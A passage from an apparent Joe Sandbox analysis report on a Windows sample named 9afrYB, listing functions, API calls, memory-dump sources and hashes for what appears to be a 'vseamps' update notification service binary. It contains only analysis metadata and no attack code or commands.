                                                                                  • Instruction Fuzzy Hash: BC3159B6304A4492EB22DF22F44479AB360F749BE4F444121EB9E07AB4DF39D489C708
                                                                                  Function 00007FF8BFB84804 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359237188.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359223150.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359280231.00007FF8BFB92000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359295333.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359308946.00007FF8BFB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff8bfb80000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                  • String ID: csm$csm$csm
                                                                                  • API String ID: 849930591-393685449
                                                                                  • Opcode ID: f1adb4ecd083bc80385bf1a1a2c543f93b0b2fb07cc426c5636c8daff4c8f18a
                                                                                  • Instruction ID: 9381b5e80184495209f5f0c5f3c325d699902bf746e82e6a64b1f95e6cdf7d75
                                                                                  • Opcode Fuzzy Hash: f1adb4ecd083bc80385bf1a1a2c543f93b0b2fb07cc426c5636c8daff4c8f18a
                                                                                  • Instruction Fuzzy Hash: F2D15C32A08782CAEB249BA9D4403AD77A4FB957D8F144136EF8D57B96DF38E491C700
                                                                                  Function 0000000140001690 Relevance: 12.5, APIs: 10, Instructions: 38memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359077787.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359063412.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359136200.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359152941.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359208093.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_140000000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID: Heap$FreeProcess
                                                                                  • String ID:
                                                                                  • API String ID: 3859560861-0
                                                                                  • Opcode ID: d3d786e63681585cbf03c2d219a109844956a30e82e5544b8f66a627abd00fb2
                                                                                  • Instruction ID: 4159c8d252e8bf7a629169213e0784b10943506046d671ff930a732f0a48acbb
                                                                                  • Opcode Fuzzy Hash: d3d786e63681585cbf03c2d219a109844956a30e82e5544b8f66a627abd00fb2
                                                                                  • Instruction Fuzzy Hash: EC1145B4915A4081F70BDF97B8187D522E2FB8DBD9F484025E70A4B2B0DF7E8499C601
                                                                                  Function 0000000140013710 Relevance: 12.5, APIs: 10, Instructions: 38memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359077787.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359063412.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359136200.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359152941.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359208093.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_140000000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID: Heap$FreeProcess
                                                                                  • String ID:
                                                                                  • API String ID: 3859560861-0
                                                                                  • Opcode ID: 2b20d9b04266fb418ab88241afe0be8334b025a235c71ad7c61a809fe6dc3135
                                                                                  • Instruction ID: 56b7ada565ecb083b5892330f511bf6cd885877ef2bee609f5ffef12e4ab2997
                                                                                  • Opcode Fuzzy Hash: 2b20d9b04266fb418ab88241afe0be8334b025a235c71ad7c61a809fe6dc3135
                                                                                  • Instruction Fuzzy Hash: E01172B4918A8081F71BDBA7B81C7D522E2FB8DBD9F444015E70A4B2F0DFBE8499C601
                                                                                  Function 00007FF8BFB8B86C Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359237188.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359223150.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359280231.00007FF8BFB92000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359295333.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359308946.00007FF8BFB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff8bfb80000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressFreeLibraryProc
                                                                                  • String ID: api-ms-$ext-ms-
                                                                                  • API String ID: 3013587201-537541572
                                                                                  • Opcode ID: d27e4f6126b13d6b256a918f8f190c41ea59ca19706b8a974bfb2f07ede01360
                                                                                  • Instruction ID: 23a896b137ac809e1cf30db329062de09d13fbd1a127ed6ec9863c1216b018b8
                                                                                  • Opcode Fuzzy Hash: d27e4f6126b13d6b256a918f8f190c41ea59ca19706b8a974bfb2f07ede01360
                                                                                  • Instruction Fuzzy Hash: 1641E421B19A5241FA16CBAEE8606BA2391BF85BE0F19C535DF1E87795EF3CE405C340
                                                                                  Function 0000000140002A00 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 66registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359077787.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359063412.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359136200.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359152941.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359208093.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_140000000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$CloseCreateEnterLeaveQueryValue
                                                                                  • String ID: SYSTEM\CurrentControlSet\Services\vseamps\Parameters$action
                                                                                  • API String ID: 1119674940-1966266597
                                                                                  • Opcode ID: f3533de3366e7bda9e1b35d25a0c2c8c172dac4edddfecf2711061c5e43c3c9b
                                                                                  • Instruction ID: f124d29d71956a548941c3df06686b2c3eef24402cfc23b06ee64cf3511db711
                                                                                  • Opcode Fuzzy Hash: f3533de3366e7bda9e1b35d25a0c2c8c172dac4edddfecf2711061c5e43c3c9b
                                                                                  • Instruction Fuzzy Hash: 6F31F975214B4186EB22CF26F884B9573A4F78D7A8F401315FBA94B6B4DF3AC148CB00
                                                                                  Function 0000000140001900 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 56memorystringCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359077787.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359063412.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359136200.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359152941.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359208093.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_140000000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID: Heap$AllocProcesslstrlen$ComputerName
                                                                                  • String ID: Security=impersonation static true$ampIfEp$ncalrpc
                                                                                  • API String ID: 3702919091-996641649
                                                                                  • Opcode ID: 625aae782f6e6c8352582bed456207495076f7317be3b5f58fd10a3b56526d44
                                                                                  • Instruction ID: 080136972d91dcf489914e021d1613250a4fb989530f4420e20b1ceb3111c88a
                                                                                  • Opcode Fuzzy Hash: 625aae782f6e6c8352582bed456207495076f7317be3b5f58fd10a3b56526d44
                                                                                  • Instruction Fuzzy Hash: 4F212A71215B8082EB12CB12F84438A73A4F789BE8F514216EB9D07BB8DF7DC54ACB00
                                                                                  Function 000000014000F3E0 Relevance: 10.7, APIs: 7, Instructions: 179COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F43A
                                                                                  • GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F459
                                                                                  • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F4FF
                                                                                  • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F559
                                                                                  • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F592
                                                                                  • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F5CF
                                                                                  • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F60E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359077787.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359063412.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359136200.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359152941.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359208093.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_140000000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID: ByteCharMultiWide$Info
                                                                                  • String ID:
                                                                                  • API String ID: 1775632426-0
                                                                                  • Opcode ID: 66d9eb7914d19e8cfe6722e8c0a791cb2122334676924f0ca9c1b8cdf3048d99
                                                                                  • Instruction ID: 43b9ce706039119b05782f2693b3e997f7dca892eef84fff4304595f3d56aff3
                                                                                  • Opcode Fuzzy Hash: 66d9eb7914d19e8cfe6722e8c0a791cb2122334676924f0ca9c1b8cdf3048d99
                                                                                  • Instruction Fuzzy Hash: 266181B2200B808AE762DF23B8407AA66E5F74C7E8F548325BF6947BF4DB74C555A700
                                                                                  Function 00007FF8BFB8712C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LoadLibraryExW.KERNEL32(?,?,?,00007FF8BFB872EB,?,?,?,00007FF8BFB83EC0,?,?,?,?,00007FF8BFB83CFD), ref: 00007FF8BFB871B1
                                                                                  • GetLastError.KERNEL32(?,?,?,00007FF8BFB872EB,?,?,?,00007FF8BFB83EC0,?,?,?,?,00007FF8BFB83CFD), ref: 00007FF8BFB871BF
                                                                                  • LoadLibraryExW.KERNEL32(?,?,?,00007FF8BFB872EB,?,?,?,00007FF8BFB83EC0,?,?,?,?,00007FF8BFB83CFD), ref: 00007FF8BFB871E9
                                                                                  • FreeLibrary.KERNEL32(?,?,?,00007FF8BFB872EB,?,?,?,00007FF8BFB83EC0,?,?,?,?,00007FF8BFB83CFD), ref: 00007FF8BFB87257
                                                                                  • GetProcAddress.KERNEL32(?,?,?,00007FF8BFB872EB,?,?,?,00007FF8BFB83EC0,?,?,?,?,00007FF8BFB83CFD), ref: 00007FF8BFB87263
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359237188.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359223150.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359280231.00007FF8BFB92000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359295333.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359308946.00007FF8BFB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff8bfb80000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                  • String ID: api-ms-
                                                                                  • API String ID: 2559590344-2084034818
                                                                                  • Opcode ID: bd0a8d2a555e0ee16e973e96254fe36908eaf1a6b67fdf5dc890da79f6d47fff
                                                                                  • Instruction ID: e3c382f85b2f7e25c9a2e88145fdd5c1e39d8ca59e9578773315590d6a43b2e5
                                                                                  • Opcode Fuzzy Hash: bd0a8d2a555e0ee16e973e96254fe36908eaf1a6b67fdf5dc890da79f6d47fff
                                                                                  • Instruction Fuzzy Hash: 1F31E721A1A64291FE16AF8AA4005B96394BF89BE4F694635EF1D07791DF3CE441C300
                                                                                  Function 00007FF8BFB89444 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359237188.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359223150.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359280231.00007FF8BFB92000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359295333.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359308946.00007FF8BFB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff8bfb80000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID: Value$ErrorLast
                                                                                  • String ID:
                                                                                  • API String ID: 2506987500-0
                                                                                  • Opcode ID: bb16a7b3e3e618224ffaf8681bb99f7b7eedade10f219c40875930e32152d962
                                                                                  • Instruction ID: 0731b976117d534006f78d901931ca1b50e5d6773c3fc47703f1c3d499b6c2c2
                                                                                  • Opcode Fuzzy Hash: bb16a7b3e3e618224ffaf8681bb99f7b7eedade10f219c40875930e32152d962
                                                                                  • Instruction Fuzzy Hash: C1212924B0C65746FA69A7F9955113963429FC8BF0F588635EB7E07AD7EE2CA441C200
                                                                                  Function 00007FF8BFB90100 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359237188.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359223150.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359280231.00007FF8BFB92000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359295333.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359308946.00007FF8BFB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff8bfb80000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                  • String ID: CONOUT$
                                                                                  • API String ID: 3230265001-3130406586
                                                                                  • Opcode ID: ba28877f08bf85aa9c21e7c9a24742ae6402465733c9a5e3506a903d1d24cb53
                                                                                  • Instruction ID: 35562966c2d05d2db681ee0f6e706a0bf0b58e2083574ab0d7740b0bb5fa833c
                                                                                  • Opcode Fuzzy Hash: ba28877f08bf85aa9c21e7c9a24742ae6402465733c9a5e3506a903d1d24cb53
                                                                                  • Instruction Fuzzy Hash: 55116D31B18A4186F7508B9AEC4432973A4FB88BE4F048234EB5E87BA4DF7CD9548744
                                                                                  Function 0000000140001270 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 41registrysynchronizationCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RegisterServiceCtrlHandlerW.ADVAPI32 ref: 0000000140001282
                                                                                  • CreateEventW.KERNEL32 ref: 00000001400012C0
                                                                                    • Part of subcall function 0000000140003F80: InitializeCriticalSection.KERNEL32 ref: 0000000140003FA2
                                                                                    • Part of subcall function 0000000140003F80: GetCurrentProcess.KERNEL32 ref: 0000000140003FF6
                                                                                    • Part of subcall function 0000000140003F80: OpenProcessToken.ADVAPI32 ref: 0000000140004007
                                                                                    • Part of subcall function 0000000140003F80: GetLastError.KERNEL32 ref: 0000000140004011
                                                                                    • Part of subcall function 0000000140003F80: EnterCriticalSection.KERNEL32 ref: 00000001400040B3
                                                                                    • Part of subcall function 0000000140003F80: LeaveCriticalSection.KERNEL32 ref: 000000014000412B
                                                                                    • Part of subcall function 0000000140003F80: GetVersionExW.KERNEL32 ref: 0000000140004155
                                                                                    • Part of subcall function 0000000140003F80: RpcSsDontSerializeContext.RPCRT4 ref: 000000014000416C
                                                                                    • Part of subcall function 0000000140003F80: RpcServerUseProtseqEpW.RPCRT4 ref: 0000000140004189
                                                                                    • Part of subcall function 0000000140003F80: RpcServerRegisterIfEx.RPCRT4 ref: 00000001400041B9
                                                                                    • Part of subcall function 0000000140003F80: RpcServerListen.RPCRT4 ref: 00000001400041D3
                                                                                  • SetServiceStatus.ADVAPI32 ref: 0000000140001302
                                                                                  • WaitForSingleObject.KERNEL32 ref: 0000000140001312
                                                                                    • Part of subcall function 00000001400042B0: EnterCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042BB
                                                                                    • Part of subcall function 00000001400042B0: CancelWaitableTimer.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042C8
                                                                                    • Part of subcall function 00000001400042B0: SetEvent.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042D5
                                                                                    • Part of subcall function 00000001400042B0: WaitForSingleObject.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042E7
                                                                                    • Part of subcall function 00000001400042B0: TerminateThread.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042FD
                                                                                    • Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000430A
                                                                                    • Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 0000000140004317
                                                                                    • Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 0000000140004324
                                                                                    • Part of subcall function 00000001400042B0: RpcServerUnregisterIf.RPCRT4 ref: 0000000140004336
                                                                                    • Part of subcall function 00000001400042B0: RpcMgmtStopServerListening.RPCRT4 ref: 000000014000433E
                                                                                    • Part of subcall function 00000001400042B0: EnterCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000435A
                                                                                    • Part of subcall function 00000001400042B0: LeaveCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000437F
                                                                                    • Part of subcall function 00000001400042B0: DeleteCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000438C
                                                                                    • Part of subcall function 00000001400042B0: #4.VSELOG(?,?,?,?,000000014000131D), ref: 00000001400043C0
                                                                                    • Part of subcall function 00000001400042B0: LeaveCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400043CC
                                                                                    • Part of subcall function 00000001400042B0: DeleteCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400043D9
                                                                                    • Part of subcall function 00000001400042B0: #4.VSELOG(?,?,?,?,000000014000131D), ref: 00000001400043E6
                                                                                  • SetServiceStatus.ADVAPI32 ref: 000000014000134B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359077787.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359063412.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359136200.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359152941.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359208093.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_140000000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$Server$CloseEnterHandleLeaveService$DeleteEventObjectProcessRegisterSingleStatusWait$CancelContextCreateCtrlCurrentDontErrorHandlerInitializeLastListenListeningMgmtOpenProtseqSerializeStopTerminateThreadTimerTokenUnregisterVersionWaitable
                                                                                  • String ID: vseamps
                                                                                  • API String ID: 3197017603-3944098904
                                                                                  • Opcode ID: 4fcaac044f33b8282c396f0e62c58db51f87a82aaa34d44751bf9634b5fd9f61
                                                                                  • Instruction ID: 0252cca9582b7aeb0e5a7a434c8e7364f46e89616d8e728b6478e43ab65cb610
                                                                                  • Opcode Fuzzy Hash: 4fcaac044f33b8282c396f0e62c58db51f87a82aaa34d44751bf9634b5fd9f61
                                                                                  • Instruction Fuzzy Hash: B921A2B1625A009AEB02DF17FC85BD637A0B74C798F45621AB7498F275CB7EC148CB00
                                                                                  Function 00000001400011F0 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 24windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359077787.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359063412.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359136200.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359152941.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359208093.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_140000000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID: Messagesprintf_s
                                                                                  • String ID: 10:52:57$Help$Jul 5 2019$usage: /service - creates the Update Notification Service /remove - removes the Update Notification Service from the sy
                                                                                  • API String ID: 2642950106-3610746849
                                                                                  • Opcode ID: 3f0d62457ab29cf1d3a00b30af1be048753c3c69edf33eb8bb254d4fd9f99961
                                                                                  • Instruction ID: 92f91a294e228129c374272f9a209b177778b3d46068e39525b46f8f62cf975d
                                                                                  • Opcode Fuzzy Hash: 3f0d62457ab29cf1d3a00b30af1be048753c3c69edf33eb8bb254d4fd9f99961
                                                                                  • Instruction Fuzzy Hash: 78F01DB1221A8595FB52EB61F8567D62364F78C788F811112BB4D0B6BADF3DC219C700
                                                                                  Function 0000000140002650 Relevance: 10.0, APIs: 8, Instructions: 43memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359077787.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359063412.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359136200.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359152941.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359208093.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_140000000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID: Heap$FreeProcess
                                                                                  • String ID:
                                                                                  • API String ID: 3859560861-0
                                                                                  • Opcode ID: 59e576179aebbdeaae5a9514a8abdff9d95dfae3be86bd59f8deebe969e5cf48
                                                                                  • Instruction ID: 80974503ddc58818480ab649a73b779641f1d99de81085d1f592bfbfa5fc6ad1
                                                                                  • Opcode Fuzzy Hash: 59e576179aebbdeaae5a9514a8abdff9d95dfae3be86bd59f8deebe969e5cf48
                                                                                  • Instruction Fuzzy Hash: 9C01EDB8701B8041EB0BDFE7B60839992A2AB8DFD5F185024AF1D17779DE3AC4548700
                                                                                  Function 0000000140002970 Relevance: 10.0, APIs: 8, Instructions: 40memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359077787.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359063412.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359136200.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359152941.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359208093.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_140000000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID: Heap$FreeProcess
                                                                                  • String ID:
                                                                                  • API String ID: 3859560861-0
                                                                                  • Opcode ID: 00b9fd02b01b7cf63ee49650963a307f7fdb827e7083e7606ed54f4b62f321e5
                                                                                  • Instruction ID: 9f3d0c666f817a9e432213240f72880bf7997caebe097eb0308f7621ef9b933c
                                                                                  • Opcode Fuzzy Hash: 00b9fd02b01b7cf63ee49650963a307f7fdb827e7083e7606ed54f4b62f321e5
                                                                                  • Instruction Fuzzy Hash: 20010CB9601B8081EB4BDFE7B608399A2A2FB8DFD4F089024AF0917739DE39C4548200
                                                                                  Function 000000014000F680 Relevance: 9.2, APIs: 6, Instructions: 204COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetStringTypeW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F6E7
                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F6FD
                                                                                  • GetStringTypeW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F72B
                                                                                  • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F799
                                                                                  • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F84C
                                                                                  • GetStringTypeA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F911
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359077787.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359063412.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359136200.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
